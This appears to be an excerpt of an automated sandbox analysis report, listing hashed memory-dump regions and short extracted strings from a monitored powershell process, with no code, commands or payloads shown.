                                                      • Instruction ID: 3d0758597bf2042bb5f081e51f9c212691199e3c68e937503e499cdfc73d5368
                                                      • Opcode Fuzzy Hash: d1de5268bdda7cb7860c50ea6c497f9ace4de09db229d88b09bf9792ae0d9901
                                                      • Instruction Fuzzy Hash: B8227CB4B00205EFDB14CB54C961BDABBB2FB85304F15C05AE9499B355CBB2EC82CB81
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q
                                                      • API String ID: 0-2697143702
                                                      • Opcode ID: 454dc90cfbdca0e77aa39db9fb636ded862b453b5107add12cc4df2073c65537
                                                      • Instruction ID: 70513687118eb09a293b3d4c520477534bbc84056538f37d3481808ad55e338d
                                                      • Opcode Fuzzy Hash: 454dc90cfbdca0e77aa39db9fb636ded862b453b5107add12cc4df2073c65537
                                                      • Instruction Fuzzy Hash: C1F192B0A40214DFD714DB68C951FAABBF3AF94304F1085A6D9096F395CB71ED828F91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2987626670.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_6d50000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q
                                                      • API String ID: 0-2697143702
                                                      • Opcode ID: cf3b989535387255cca07501735ca1f42716826e992963bfe0d950381938edd7
                                                      • Instruction ID: 2662e43e7c31e28d706b6e9c234f713e4f6f49b455495557d3266fb9e6b5767a
                                                      • Opcode Fuzzy Hash: cf3b989535387255cca07501735ca1f42716826e992963bfe0d950381938edd7
                                                      • Instruction Fuzzy Hash: 50F1D370A402189FDB24DB68CD55B9ABBF2EB84304F1184A5D909AF7A5CB31DD82CF91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \VHm$\VHm
                                                      • API String ID: 0-4104177699
                                                      • Opcode ID: 5d1cc8f9d5b38c2cfd15805fa91fefba6b9c28a4517d2f2c6099a2a01052a482
                                                      • Instruction ID: 715fa23c68a546d1553bc2b934760a066f6ebc723305766dfa49777b333db0fc
                                                      • Opcode Fuzzy Hash: 5d1cc8f9d5b38c2cfd15805fa91fefba6b9c28a4517d2f2c6099a2a01052a482
                                                      • Instruction Fuzzy Hash: B37169B0E002098FDF50CFA8D88079EBBF1BF48314F158129E959A7794DB749846CF95
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \VHm$\VHm
                                                      • API String ID: 0-4104177699
                                                      • Opcode ID: 939ae698d6a3b354b0fdc0ed3be72b88138a8eca54de03c1717c87bb976698c8
                                                      • Instruction ID: aa31ea73754fb88ce5633eb0eb10936fa06f82650bf2232fab3b8e9d1e07eaff
                                                      • Opcode Fuzzy Hash: 939ae698d6a3b354b0fdc0ed3be72b88138a8eca54de03c1717c87bb976698c8
                                                      • Instruction Fuzzy Hash: EA716BB0E002099FDF50CFA9D88079EBBF2BF88314F158029E559A7794EB749846CF95
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: h]Hm$IHm
                                                      • API String ID: 0-911805665
                                                      • Opcode ID: c7647c8fb4ef6d83426996345ce17535b6a2249e2a8796287d39c9af4f7b0753
                                                      • Instruction ID: 6f92bc7203590cb0a38f1b5fd7480d873a90625692154361cbb6c217c540f760
                                                      • Opcode Fuzzy Hash: c7647c8fb4ef6d83426996345ce17535b6a2249e2a8796287d39c9af4f7b0753
                                                      • Instruction Fuzzy Hash: A8316F30B041188FDF65DB64C894AEEB7B2AF89349F1144EAC50AAB355CB35DE81CF81
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $^q$$^q
                                                      • API String ID: 0-355816377
                                                      • Opcode ID: 89c88d92f97c0b85b9bec3a9f03d4d666db0ab7a40572ab55b65a050a2a794d4
                                                      • Instruction ID: e414f5834f56e5021c6c5ff28fc3ca671bb2e1c823701f2db9ee2e081eba7ade
                                                      • Opcode Fuzzy Hash: 89c88d92f97c0b85b9bec3a9f03d4d666db0ab7a40572ab55b65a050a2a794d4
                                                      • Instruction Fuzzy Hash: D511E1F6E0021ADB8F24CE6985741EAB7F4AF48610F264927CC58EB314D630DD05CBA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \VHm
                                                      • API String ID: 0-3272467948
                                                      • Opcode ID: c5bd42ab39b78b6ec2f809d402fb69d0ee945df241d55a7bb082b9ef297d06e6
                                                      • Instruction ID: 5bbba5c77379eec3cc2194ba3bdb6df17b66d9d1c0d7eb310d3e28a758b4ced6
                                                      • Opcode Fuzzy Hash: c5bd42ab39b78b6ec2f809d402fb69d0ee945df241d55a7bb082b9ef297d06e6
                                                      • Instruction Fuzzy Hash: 63B16B70E00209CFDB50CFA9D88579DBBF2AF48318F158129E919AB3A4EB749845CF85
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 451bcb4ccb04888edffc191a02a62cb842b1bd29ee3c5f275ac258f73fd2b186
                                                      • Instruction ID: a4cba34b9d44b59bfc230550c41a3e721fc706d90afe45bfd3e7abaf70a70850
                                                      • Opcode Fuzzy Hash: 451bcb4ccb04888edffc191a02a62cb842b1bd29ee3c5f275ac258f73fd2b186
                                                      • Instruction Fuzzy Hash: F3C1D0709093948FC706CF68C8A49EABFB1EF46314B194197D894DB3A6C335EC85CBA5
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7d722548583c59582d53490a7eb464fd214bff0f217535db6ac91c0fe485567e
                                                      • Instruction ID: 8e486179178d76a35428bd63b3320d5d5f833d0cea9c9ea61ee9cb7e93902c24
                                                      • Opcode Fuzzy Hash: 7d722548583c59582d53490a7eb464fd214bff0f217535db6ac91c0fe485567e
                                                      • Instruction Fuzzy Hash: FEC18931E00208DFCB54DFA4D554A9DBBB6FF85314F168568E906AB3A5CB34EC89CB84
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6ee1241bd10943bee8c708f68dcc2d387c7f661c58195f1612e743804119a0aa
                                                      • Instruction ID: 6c7b5f2570e788c9cef9550a2c3d1d89d4b6c6aaa254079e06d41b33b6deece3
                                                      • Opcode Fuzzy Hash: 6ee1241bd10943bee8c708f68dcc2d387c7f661c58195f1612e743804119a0aa
                                                      • Instruction Fuzzy Hash: B8D11A74A01248EFCB84CFA8D584A9DFBF2AF48314F26C195E845AB361C731ED85CB94
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 81ec360d55f582b97e9cf78e67871ed179c20dc16e13e07c6f1b9f5fefecc724
                                                      • Instruction ID: a1cce413112166befe788495fea58a300d8b63ef3de4ea88abbc8f4badf64aad
                                                      • Opcode Fuzzy Hash: 81ec360d55f582b97e9cf78e67871ed179c20dc16e13e07c6f1b9f5fefecc724
                                                      • Instruction Fuzzy Hash: 64B194B0B00205EFDB14DB68C565BAE7BF3AB89304F10846AD9156F395CB31EC86CB91
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8c88185cc8666ba2afd49e5e6ac835e5968e742409556b2d3a4aea59727daa13
                                                      • Instruction ID: 0acf4365afc48384195e6e6feb90c074ef7bbbf1c375e5202eaa563ec6e40307
                                                      • Opcode Fuzzy Hash: 8c88185cc8666ba2afd49e5e6ac835e5968e742409556b2d3a4aea59727daa13
                                                      • Instruction Fuzzy Hash: 39A1C4B0A00205EFDB15CB54C561BEEBBF2AF89304F10846AD9556F395CB31EC86CB91
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0b00832ce123229ca7af70b2994ab74840f789f6c2a4f8bfd756b4c2469fcd1a
                                                      • Instruction ID: 5859fd4ded3c396e436954f35bed5aba69f16ac5ea093616c8f30d2940999729
                                                      • Opcode Fuzzy Hash: 0b00832ce123229ca7af70b2994ab74840f789f6c2a4f8bfd756b4c2469fcd1a
                                                      • Instruction Fuzzy Hash: 2BB19D70E002098FDF60CFA8D88179DBBF1AF48318F198129D919EB794EB749C85CB85
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 81cdebbe767decf8abdf5bb32035e8ae3ebd2c4b6eb4c34f763f62712b507d41
                                                      • Instruction ID: 59c7fe10aae65216292c39a9399f57f374e53650474327733fcc74b1c14de72e
                                                      • Opcode Fuzzy Hash: 81cdebbe767decf8abdf5bb32035e8ae3ebd2c4b6eb4c34f763f62712b507d41
                                                      • Instruction Fuzzy Hash: 5381DF34A05244AFCB05CFA8D4849ADBBF2FF89314F1984A9E545EB322CB35EC81DB51
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f6aecc8690794b17f4bd02e789cfa0926bd166548b461f7215f1be9f2485619d
                                                      • Instruction ID: a0c6a2892e35be37fa5fecf5289f160a52f3e5ee9dcc3714a4e0b2bd5bfe0dfa
                                                      • Opcode Fuzzy Hash: f6aecc8690794b17f4bd02e789cfa0926bd166548b461f7215f1be9f2485619d
                                                      • Instruction Fuzzy Hash: 8A715EB4A04205EFCB14CF54C465ADABBF2EF49314F14855BE854AB365CB36EC82CB91
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6c217889453d4cb713223ed4448f7877f8468a6c9bd85edaf9c12800d0706e9f
                                                      • Instruction ID: cb1efac241dc30cb359b572906e89a7b843763301a352765bf2454a64b5e7759
                                                      • Opcode Fuzzy Hash: 6c217889453d4cb713223ed4448f7877f8468a6c9bd85edaf9c12800d0706e9f
                                                      • Instruction Fuzzy Hash: 977172B0A04205EFCB14CF58C565ADEBBF2EF89314F14846AD854AB355CB32EC82CB91
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d6fc2bc965100882e0cd4676d69cbba87ea209eb090d6cedaa24d3607474fe95
                                                      • Instruction ID: b8709a7287eac7532b79aa42e82a14da79b17397a4a9440e74452ac7f9b5287e
                                                      • Opcode Fuzzy Hash: d6fc2bc965100882e0cd4676d69cbba87ea209eb090d6cedaa24d3607474fe95
                                                      • Instruction Fuzzy Hash: 7D71AB30A00209CFCB14DF68D494A9EBBF2EF85314F15896AE419DB3A1DB75EC46CB94
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 626d324999fbec7f6c080e447b5ea69ecdd9280c5dd5e137d4012719b61f8a44
                                                      • Instruction ID: d001bdecad737f2b51d99ea2967156ae7ad542957740951eee8b480c79a5382c
                                                      • Opcode Fuzzy Hash: 626d324999fbec7f6c080e447b5ea69ecdd9280c5dd5e137d4012719b61f8a44
                                                      • Instruction Fuzzy Hash: 1C712870E00208DFDB15DFB5D494BADBBB2BF88308F158529D516AB390DB34AC86CB55
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 310b4dfe88ce92bc821ce0cbb0118d659ddb831c5f76e1a292a0456902628047
                                                      • Instruction ID: 85f9369a666a1e230b5326962874ee858b1965c3a2f09159c24e642894cb4cad
                                                      • Opcode Fuzzy Hash: 310b4dfe88ce92bc821ce0cbb0118d659ddb831c5f76e1a292a0456902628047
                                                      • Instruction Fuzzy Hash: D0417E3560E3E15FD703DB68A9604EA7F70EE87220B1A81E7D480DB2A3C624DD49C7A5
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 18a10eccf2cc310aa3025888829a195aa3f9eddadbfefc0101ee9a23c7c197c7
                                                      • Instruction ID: afba318fd48114ebeb8091e04df228aaa57058c1b44c9a6b40f673f735b87b9a
                                                      • Opcode Fuzzy Hash: 18a10eccf2cc310aa3025888829a195aa3f9eddadbfefc0101ee9a23c7c197c7
                                                      • Instruction Fuzzy Hash: 894128F1B40210DBCB1557B84861AEFBB929FD1224B1045AFD9429B351DE329D46C7A2
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f453bb597a7214e65455cbbfeaa4275e3d31ad4bf3a725ccb45cdccd7269c634
                                                      • Instruction ID: 973709f26a849e4793a20bcd2d8be093cd63734cd18af94fd720db60b55b4091
                                                      • Opcode Fuzzy Hash: f453bb597a7214e65455cbbfeaa4275e3d31ad4bf3a725ccb45cdccd7269c634
                                                      • Instruction Fuzzy Hash: 7D414970E00208DFDB58DFA9C86479EBBB2FF85304F158829D446AB394EB75AC45CB54
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 112b3ba6bc80d1c278de7d9cc0cf917db62bfce40b19791b446b62d8c66dce01
                                                      • Instruction ID: 437ab46e9c2cd49c9f285dc7d7f5c043ac8b97d28d97d5bcf97bca00bedc7a6b
                                                      • Opcode Fuzzy Hash: 112b3ba6bc80d1c278de7d9cc0cf917db62bfce40b19791b446b62d8c66dce01
                                                      • Instruction Fuzzy Hash: F1417730A40280CFDB19DF24C968BAEBBB6EF89355F154868E506EB3A0DB359C41CB54
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 830c6ad5affdf6b1cbca38b42b029430df46ad572b0c1e524daf12f012fb9524
                                                      • Instruction ID: eb1d1d4de3030df6ecde36d324b4d33f59b88b4dad0dddcee03671e1d47e9d66
                                                      • Opcode Fuzzy Hash: 830c6ad5affdf6b1cbca38b42b029430df46ad572b0c1e524daf12f012fb9524
                                                      • Instruction Fuzzy Hash: 35414DB0A04205EBDB14CF94C5A1AEAFBB2FF49314F14855AE855AB355C731EC82CF91
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 32628bd4ab340404755cab161a6ff0b65ecea0258cfc6282f3b5a1c2abccaf02
                                                      • Instruction ID: be2c60b61b6c8718abcc7fdd2da986fb7831248ec1857844da976a60887fec37
                                                      • Opcode Fuzzy Hash: 32628bd4ab340404755cab161a6ff0b65ecea0258cfc6282f3b5a1c2abccaf02
                                                      • Instruction Fuzzy Hash: 444148B5A005058FCB45CF49C998AEAFBB1FF48314B12825AD905AB365C736FC91CFA4
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a9af61d1b97a0a0f3f50b7a1c1ff9e46b679818a2137c34a08ca74d132448392
                                                      • Instruction ID: 1a2e78c03f8844ff529f98969bab794198faca1c774dcaefd54b5641f48fe62b
                                                      • Opcode Fuzzy Hash: a9af61d1b97a0a0f3f50b7a1c1ff9e46b679818a2137c34a08ca74d132448392
                                                      • Instruction Fuzzy Hash: B631B5B0B40208AFD704A764C855FEE7BA3EB95744F108425E9156F3A5CF76AC428BE1
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8b85c9e6f2afbc964ea848b7e1ff09e3e83345df0e1b2fc5a6e73f6d3c48cd08
                                                      • Instruction ID: dde27022a346660ea710c5c47a97970c802257215530282e1e405d2902ad8b0c
                                                      • Opcode Fuzzy Hash: 8b85c9e6f2afbc964ea848b7e1ff09e3e83345df0e1b2fc5a6e73f6d3c48cd08
                                                      • Instruction Fuzzy Hash: 5F217CB13043167BCB2459EA8820BB7B6C6ABD5709F20882BA589CF390CE75CC418361
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fa091b6508715eca478aa3b91076ab74b93127ee206fe98e75093a5d462ce1ad
                                                      • Instruction ID: 5bf1a61e72fcaafba4a8be0319e2e169ada111b45044624da19e6cf03b7c8ca0
                                                      • Opcode Fuzzy Hash: fa091b6508715eca478aa3b91076ab74b93127ee206fe98e75093a5d462ce1ad
                                                      • Instruction Fuzzy Hash: 63216DB43083967BC71106A688207F77BE59F92704F248457A984CF3A2C6758C84C372
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 960664480e36cb81bfc3296881c9450abe4eb1c61e493dd3d213ccc90404bb5b
                                                      • Instruction ID: 74e4155a18a9a10c35ca6d67831e08b2399edec42bedfc0fa7fdc02e5397bf3d
                                                      • Opcode Fuzzy Hash: 960664480e36cb81bfc3296881c9450abe4eb1c61e493dd3d213ccc90404bb5b
                                                      • Instruction Fuzzy Hash: 2301D4763002169BC72465AAE4106ABB799DFC2222F14883FE585CB760DA32CC4587A0
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2235f8410febec42bf209657b2c33a65882b00dd7a1d56f60189e9743cbc692e
                                                      • Instruction ID: b14e5daa972cefef16bdfed3bede2a26abd2bf5e4445f03925403c05d2a0b17e
                                                      • Opcode Fuzzy Hash: 2235f8410febec42bf209657b2c33a65882b00dd7a1d56f60189e9743cbc692e
                                                      • Instruction Fuzzy Hash: 3F11C830D11158DBDF74DB94E5987ECB7B2AF0531AF162429D201B62A0EB745C89CF1A
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2969960776.0000000002D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D8D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2d8d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5a751f27dce5bb3bac87bde78678190a60a65ef9c4bd6d8e16eaa63a8db8beec
                                                      • Instruction ID: 92f11797e8c303cdf8fa4b8d8c1aad9de4e74c08caf5ab2ef114d328517f58af
                                                      • Opcode Fuzzy Hash: 5a751f27dce5bb3bac87bde78678190a60a65ef9c4bd6d8e16eaa63a8db8beec
                                                      • Instruction Fuzzy Hash: 0F0126710083049AE720AA3ADD84B67BF99EF41324F28C42AEC484B3C6C779DC41C6B1
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2969960776.0000000002D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D8D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2d8d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 692bc43726dc9c495f2885213c4a169cfb34d72c30d9565a7fdd6880e22ae8f6
                                                      • Instruction ID: 8637e4a69bca9852c6b654924358ed3c1dbb78a1843a3863076303c2ec3fd622
                                                      • Opcode Fuzzy Hash: 692bc43726dc9c495f2885213c4a169cfb34d72c30d9565a7fdd6880e22ae8f6
                                                      • Instruction Fuzzy Hash: 8A01296100E3C09ED7128B358C94B62BFB4EF47224F1984DBD8888F2E3C2699849C772
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$84l$84l$tP^q$tP^q$t~qq$$^q$$^q$$^q$$^q
                                                      • API String ID: 0-758525668
                                                      • Opcode ID: 2ccc0f596e44a01aeebdb9d1fdeb84b1d6c6e1251d4c23134f27111db0016ee0
                                                      • Instruction ID: 87f5d46cb05fa8c810be55396e9195a3c7d08ed2a416c88dda85a2b908e25f56
                                                      • Opcode Fuzzy Hash: 2ccc0f596e44a01aeebdb9d1fdeb84b1d6c6e1251d4c23134f27111db0016ee0
                                                      • Instruction Fuzzy Hash: 85F136B1B00216DFCB159F6994206EBBBE2BF85210F14886BD4858F355DF72DC86C7A2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2987626670.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_6d50000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                      • API String ID: 0-518715366
                                                      • Opcode ID: 9cfba05a3c5524b5244ee05de9652094325e9ff151b0f0326a249755ecafa1cc
                                                      • Instruction ID: f7a83388c2af06637cb933b4d18f0e268f169a41a7a3b5dd29ee40fa78265916
                                                      • Opcode Fuzzy Hash: 9cfba05a3c5524b5244ee05de9652094325e9ff151b0f0326a249755ecafa1cc
                                                      • Instruction Fuzzy Hash: E1F159B0A40218DFDB64DB24C954B9ABBB2FB84304F1085E5D9086B395CB71AEC6CF91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                      • API String ID: 0-3512890053
                                                      • Opcode ID: c7bb2c8b3bf76062871dbc7a5f138b78e5142cf689b5fd6a43830697806dc23d
                                                      • Instruction ID: 05c6b9886a49e8209b19667837fda8e61f32abc1fcd0fe83ecb301be3a9287ef
                                                      • Opcode Fuzzy Hash: c7bb2c8b3bf76062871dbc7a5f138b78e5142cf689b5fd6a43830697806dc23d
                                                      • Instruction Fuzzy Hash: 7BA106B1B04246DFCB244E6998246EB7BE5AF82610F15886BD485CB351DF35CC86C7A3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
